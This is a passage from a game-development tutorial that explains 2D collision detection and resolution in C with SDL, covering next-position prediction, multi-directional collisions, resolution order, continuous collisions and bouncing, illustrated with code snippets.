    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

It relied on a speed variable (representing the vertical speed) that was added to the character’s position every frame, making it fall while accelerating.
As a floor, we had the coordinate Y=500, to which the character was brought back if it went past it.

Note that rect->y represents the top edge of the character: at y=500 its top is at 500 and its bottom at 500+h, so slightly inside the floor. The correct position would be personnage->rect->y = 500 - personnage->rect->h, but that does not change the demonstration of the principle.

However, this method led to a small problem:
when the character fell from high up, its speed made it visibly go past the 500 barrier before being brought back on the next frame, producing a rollback effect.

Anticipating the next position

The fix was to anticipate the character’s position on the next frame and place it directly at the right position (we could have checked the character’s Y position again before rendering it, but that amounts to much the same thing). This idea of anticipating the next position is a foundation for the rest of this collision system’s development.

Here is the code implementing this idea:

speed += 0.2;
if (personnage->rect->y + speed >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

(The “+ speed” after the character’s Y position in the if: a discreet but very effective change)

From there, we can improve an object’s structure so that it stores the object’s X and Y velocity values.
We will also create a function (GetNextPosition) that uses them to return the Rect of our object’s next position.

Object-to-object collisions

The next step is to improve what our player collides with. For now we simply use a height hard-coded in the code, so let’s try using another game object!

So we move on to “object-object” collisions:
To know whether one object collides with another, we need to know whether they overlap, in other words whether there is an intersection between them.
Since we only use rectangles for now, we can conveniently use the SDL function named “SDL_IntersectRect”, which tells us whether two Rects intersect and, if so, gives us the rectangle representing that intersection, as shown in the following diagram:

In our case, we have a character that intersects a rectangle representing the floor, as follows:

We can see the collision between these two objects: SDL_IntersectRect would indeed return TRUE, and we would also get back the equivalent of the blue rectangle here, which represents the intersection of these two Rects.
Note also that this diagram does not show the next-position simulation we created earlier. In practice, at rest the character would be standing on the floor and would gain vertical velocity every frame (due to gravity). That would move its next-position box into the floor, which lets us detect the collision and cancel the vertical speed gained, effectively keeping the character motionless on the floor and preventing it from passing through.
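To make the intersection test concrete, here is a minimal Python sketch of an axis-aligned rectangle intersection in the spirit of SDL_IntersectRect. It is not SDL’s implementation: Rect and intersect_rect are hypothetical stand-ins, and the coordinates are invented for the example.

```python
from collections import namedtuple

Rect = namedtuple("Rect", "x y w h")   # same fields as an SDL_Rect


def intersect_rect(a, b):
    """Return the overlap of two rectangles, or None when they do not overlap."""
    left = max(a.x, b.x)
    top = max(a.y, b.y)
    right = min(a.x + a.w, b.x + b.w)
    bottom = min(a.y + a.h, b.y + b.h)
    if right <= left or bottom <= top:
        return None                    # empty intersection: no collision
    return Rect(left, top, right - left, bottom - top)


ground = Rect(0, 500, 800, 50)
ghost_box = Rect(100, 470, 32, 40)     # next position: bottom edge at y=510
overlap = intersect_rect(ghost_box, ground)

# Push the next position back up by the height of the overlap
resolved_y = ghost_box.y - overlap.h
print(overlap, resolved_y)
```

After the correction, the bottom edge of the box sits exactly on the top edge of the ground, which is the resting state described above.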

In our code, all we have to do is use SDL_IntersectRect to detect whether there is a collision between our character’s future position and the object being collided with. If so, we move the player on top of it:
personnage->y = obstacle->y - personnage->height
OR
personnage->y = personnageNextPos->y - IntersectRect->height

SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox: projection of the player's future position
// Let's not forget the trick of using the object's next position.

SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collidee->rect, intersect);

if (hasCollided == SDL_TRUE) {
    collider->rect->y = collidee->rect->y - collider->rect->h;
}

free(intersect);

Now we finally have a system that lets the character fall onto an object and stay there without moving!

Multi-directional collisions

However, a new problem :)
The code shown above would lead to situations like this one:

If our player collides from the side with what represents the floor, it gets teleported on top of it.
This is obviously not the behavior we want, so we need to adapt our code to make it more general.
The goal is to handle collisions cleanly whether they come from the side, from above or from below!

But to begin with, let’s limit ourselves to making collisions work on 1 axis.
Our current code works for a collision on a single axis, AND coming from only one side of that axis. Indeed, whenever we collide with the floor we coded just above, we get teleported on top of it.

To start solving this problem, let’s first change axis. The Y axis we have used so far was intuitive from the point of view of gravity, but the fact that its value increases going down is not.
So let’s take the example of a wall and define the terms of the explanation:
In the examples that follow, we refer to the player’s next position as the GhostBox, which is simply a projection of the player based on its current velocity.

With what we defined previously, this collision would be resolved by placing the player right up against the wall.

Here is the complete code implementing collisions from all sides, with several objects at once:

WindowElement* collider = personnage;
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox: projection of the player's future position

// obs holds the objects of the world
for (unsigned i = 0; i < obs->lenght; ++i) {
    WindowElement* collidee = obs->objects + i; // equivalent to &obs->objects[i]
    SDL_Rect* collideeNextPos = GetNextPosition(collidee);

    SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
    SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideeNextPos, intersect);

    if (hasCollided == SDL_TRUE) {

        // In each of these `if` statements, we check the collider's position relative to the collidee using their current positions,
        // NOT their future positions, while knowing that their next positions do collide.
        // Here, for example, we know a collision WILL happen, and we check whether it comes from above
        if (collider->rect->y + collider->rect->h <= collidee->rect->y)
        {
            collider->vY = 0;
            colliderNextPos->y -= intersect->h;
        }
        else if (collider->rect->y >= collidee->rect->y + collidee->rect->h) // collision comes from below
        {
            collider->vY = 0;
            colliderNextPos->y += intersect->h;
        }

        if (collider->rect->x + collider->rect->w <= collidee->rect->x) // collision comes from the left
        {
            collider->vX = 0;
            colliderNextPos->x -= intersect->w;
        }
        else if (collider->rect->x >= collidee->rect->x + collidee->rect->w) // collision comes from the right
        {
            collider->vX = 0;
            colliderNextPos->x += intersect->w;
        }
    }

    free(intersect);

    collidee->rect->x = collideeNextPos->x;
    collidee->rect->y = collideeNextPos->y;
}
// Now that we have crafted a consistent next position, we apply it
collider->rect->x = colliderNextPos->x;
collider->rect->y = colliderNextPos->y;

Collision resolution order

This implementation has a subtlety: collisions are resolved in the order of the obs->objects array. In DuckDuckGame, two floors teleport in a loop to simulate infinite scrolling, and the player can end up colliding with both at once at their junction.

If A is resolved first, only a vertical collision is detected; it is resolved correctly and B no longer causes a problem. If B is resolved first, however, the GhostBox overflows on both Y and X: the two resolutions are mutually exclusive. Since our code checks Y before X, the behavior depends on which of the two conditions is satisfied, and at a junction, a player sliding horizontally can trigger the X collision first, which blocks it as if against an invisible wall.

Note that resolving X before Y would not fix the problem at the engine level: it would simply invert the problematic case. Two walls stacked vertically would then form an invisible platform.

Several approaches were considered to determine the resolution order:

Naive distance (center to center): sort by the distance between the player’s center and each object’s center. Rejected: if A and B have radically different sizes, the distance is biased by size rather than reflecting actual proximity.
Intersection area: resolve first the object with the largest collision area. Makes the problem less likely but does not eliminate it.
Double computation: compute both possible resolutions and keep the one that is furthest away. Costly and probably prone to edge cases.
Orthogonal projection: for each object, orthogonally project the player’s center onto the object to get the closest point belonging to it, then sort by that distance. Fixes the size bias while remaining simple.

Dans la pratique, le problème était imperceptible dans le jeu final, donc cette approche est restée au stade de la réflexion.
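As an illustration only, the orthogonal projection idea could be sketched as follows. This is not code from the game: the Box type, the function names and the use of a file-scope variable to pass the player's center to qsort are all assumptions made for the example (the engine itself works with SDL rects). The closest point on an axis-aligned box is obtained by clamping the player's center to the box's extents, and squared distances are compared to avoid a square root.

```c
#include <stdlib.h>

/* Hypothetical minimal rectangle type (the engine itself uses SDL rects). */
typedef struct { float x, y, w, h; } Box;

/* Clamp v into [lo, hi]. */
float clamp_float(float v, float lo, float hi) {
    return v < lo ? lo : (v > hi ? hi : v);
}

/* Squared distance from point (px, py) to the closest point of box b.
   Returns 0 when the point lies inside the box. */
float closest_point_dist2(float px, float py, const Box *b) {
    float cx = clamp_float(px, b->x, b->x + b->w);
    float cy = clamp_float(py, b->y, b->y + b->h);
    float dx = px - cx, dy = py - cy;
    return dx * dx + dy * dy;
}

/* Player center read by the comparator (qsort takes no user-data argument). */
static float g_px, g_py;

static int by_projected_distance(const void *a, const void *b) {
    float da = closest_point_dist2(g_px, g_py, (const Box *)a);
    float db = closest_point_dist2(g_px, g_py, (const Box *)b);
    return (da > db) - (da < db);
}

/* Sort obstacles in place so the one nearest to the player's center comes first. */
void sort_by_projection(Box *obstacles, size_t count, const Box *player) {
    g_px = player->x + player->w / 2.0f;
    g_py = player->y + player->h / 2.0f;
    qsort(obstacles, count, sizeof *obstacles, by_projected_distance);
}
```

With a very wide floor and a narrow one meeting at a junction, a center-to-center sort would favor the narrow floor simply because its center is nearer, whereas this sort picks whichever floor actually lies closest to the player.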

Attempt: continuous collisions

This approach works perfectly well for typical use, but it has limits in extreme cases. Suppose the Player moves at a very high speed: its "GhostBox" could land directly behind the obstacle, and the player would pass straight through it. Here is a diagram illustrating this:

We can try to implement a solution with SDL_UnionRect (or its float counterpart SDL_UnionFRect, used in the snippet below), which returns the rectangle spanning the player from its current position to its GhostBox (future position).

The only difference from the previous code is the detection: instead of using the GhostBox directly, we build a deltaBox covering the player from its current position to its GhostBox, then check for an intersection with that box. The resolution stays the same.

SDL_FRect* deltaBox = (SDL_FRect*) malloc(sizeof(SDL_FRect));
SDL_UnionFRect(collider->rect, colliderNextPos, deltaBox);
SDL_bool hasCollided = SDL_HasIntersectionF(deltaBox, collideeNextPos);
free(deltaBox);

After testing this method, I observed one problem and suspect another.
The problem I observed is that a character standing on a rising platform can no longer jump. After investigation, this is because the union box in this code includes the character's current position instead of being based solely on its future positions. This creates a collision where there would have been none in the future.
This problem can be mitigated by subtracting the width and height of the character's Rect from this box and shifting it in the direction of movement.
However, this problem made me think of another one. The union box exists to provide continuous collisions even when the object moves at high speed. But if the object moves diagonally, the box also covers the two corners on either side of the diagonal path, and it can collide with a wall that the object would simply have passed beside under a normal calculation. Fixing this would require raycasts to check whether a LINEAR intersection exists. See the following diagram:

Since the initial system is already sufficient for what we are doing, and our time for experimenting is limited, we will go back to the previous version of the collision system. If we ever need a more robust version, however, the model is here.
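For reference, the raycast check mentioned above can be sketched with the classic slab method, which tests whether the straight segment between two points crosses an axis-aligned box. This is a minimal sketch under assumptions, not code from the game: the Box type and segment_hits_box are hypothetical names, and the segment is assumed to run from the player's current center to its next center. Handling the player's full extent would additionally require growing the obstacle by half the player's size, which is left out here.

```c
#include <stdbool.h>

/* Hypothetical minimal rectangle type (the engine itself uses SDL rects). */
typedef struct { float x, y, w, h; } Box;

/* Returns true if the segment from (x0, y0) to (x1, y1) touches box b.
   Slab method: start with the parameter interval [0, 1] and shrink it to
   the part of the segment lying inside the box on each axis. */
bool segment_hits_box(float x0, float y0, float x1, float y1, const Box *b) {
    float tmin = 0.0f, tmax = 1.0f;
    const float origin[2] = { x0, y0 };
    const float delta[2]  = { x1 - x0, y1 - y0 };
    const float lo[2]     = { b->x, b->y };
    const float hi[2]     = { b->x + b->w, b->y + b->h };

    for (int axis = 0; axis < 2; ++axis) {
        if (delta[axis] == 0.0f) {
            /* No movement on this axis: the start must already be inside the slab. */
            if (origin[axis] < lo[axis] || origin[axis] > hi[axis]) return false;
            continue;
        }
        float t1 = (lo[axis] - origin[axis]) / delta[axis];
        float t2 = (hi[axis] - origin[axis]) / delta[axis];
        if (t1 > t2) { float tmp = t1; t1 = t2; t2 = tmp; }
        if (t1 > tmin) tmin = t1;
        if (t2 < tmax) tmax = t2;
        if (tmin > tmax) return false; /* the per-axis intervals do not overlap */
    }
    return true;
}
```

A fast horizontal move across a thin wall is detected even though the end position lies behind the wall, while a diagonal move that merely passes beside a wall is not reported, unlike with the union box.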

Bouncing

Implementing a bounce system is fairly simple once the physics foundations are in place.
We only need to define a bounce coefficient for game objects and multiply the player's velocity along the collision axis by the negative of that coefficient, which reverses its direction and scales it by the chosen factor.
Example:
The player moves right at a speed of 5 (movement along X) and hits an obstacle with a bounce coefficient of 1.
We have player_velocity * -(bounce_coeff) = new_player_velocity,
so here 5 * -1 = -5: the player moves the other way with no loss of speed, which is the expected behavior.

Here is what this looks like in code:

// ...
// If a collision occurred:

// Bounce coefficient:
// 0 -> No bounce
// 1 -> Full bounce, no loss of momentum
float bounciness = 1;

// If the collision is on the Y axis, coming from above
if (collider->rect->y + collider->rect->h <= collidee->rect->y)
{
    // Negate the Y velocity and multiply it by the bounce coefficient
    collider->vY *= -bounciness;

    // Collision handling
}
// Handling of the Y axis from below and of the X axis is similar
// ...

Note that this formula assumes the collidee is static, or at least that it does not react to the collision (it could, for example, be in linear motion, like a moving platform). If both objects are moving and react to each other, we would need to introduce the notion of mass and apply conservation of momentum to compute the new velocities of both objects.
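To make that last case concrete, here is a minimal sketch of a two-body bounce along a single axis. Nothing here comes from the game's code: Body1D and resolve_bounce_1d are hypothetical names, and the bounce coefficient is interpreted as the usual coefficient of restitution. Total momentum is conserved, and the relative velocity after impact equals the relative velocity before impact multiplied by minus the coefficient.

```c
/* Hypothetical body: mass and velocity along the collision axis. */
typedef struct { float mass; float v; } Body1D;

/* Resolve a collision between a and b along one axis.
   restitution: 0 -> the bodies move on together, 1 -> no loss of energy. */
void resolve_bounce_1d(Body1D *a, Body1D *b, float restitution) {
    float total_mass = a->mass + b->mass;
    float momentum   = a->mass * a->v + b->mass * b->v; /* conserved quantity */
    float closing    = a->v - b->v;                     /* relative velocity before impact */

    float va = (momentum - b->mass * restitution * closing) / total_mass;
    float vb = (momentum + a->mass * restitution * closing) / total_mass;
    a->v = va;
    b->v = vb;
}
```

With equal masses and a coefficient of 1, a body moving at 5 that hits a body at rest stops and hands its velocity over. When the second body is far heavier than the first, the result tends toward the simple sign flip used for static obstacles.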
